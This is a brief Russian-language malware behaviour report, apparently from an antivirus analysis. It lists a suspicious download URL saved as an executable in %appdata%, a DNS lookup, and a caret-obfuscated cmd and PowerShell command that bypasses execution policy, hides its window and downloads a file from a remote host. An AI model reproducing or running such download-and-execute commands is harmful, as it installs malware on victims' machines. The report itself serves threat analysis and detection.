Техническая информация
- http://www.fapoergol.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "poWe^r^sheL^l.ExE^ -^Ex^EcUt^i^onpo^Li^Cy B^yPA^sS^ ^-n^op^RoFil^E -w^inDo^WST^yle ^hI^DD^en ^(^new-^OBJeC^t^ sYST^e^M^.^n^E^t.W^eb^ClieNt^)^.^dO^w^N^L^o^a^D^FIL^E('http://www...
- DNS ASK fa###rgol.top
- '<SYSTEM32>\cmd.exe' /C "poWe^r^sheL^l.ExE^ -^Ex^EcUt^i^onpo^Li^Cy B^yPA^sS^ ^-n^op^RoFil^E -w^inDo^WST^yle ^hI^DD^en ^(^new-^OBJeC^t^ sYST^e^M^.^n^E^t.W^eb^ClieNt^)^.^dO^w^N^L^o^a^D^FIL^E('http://www... (со скрытым окном)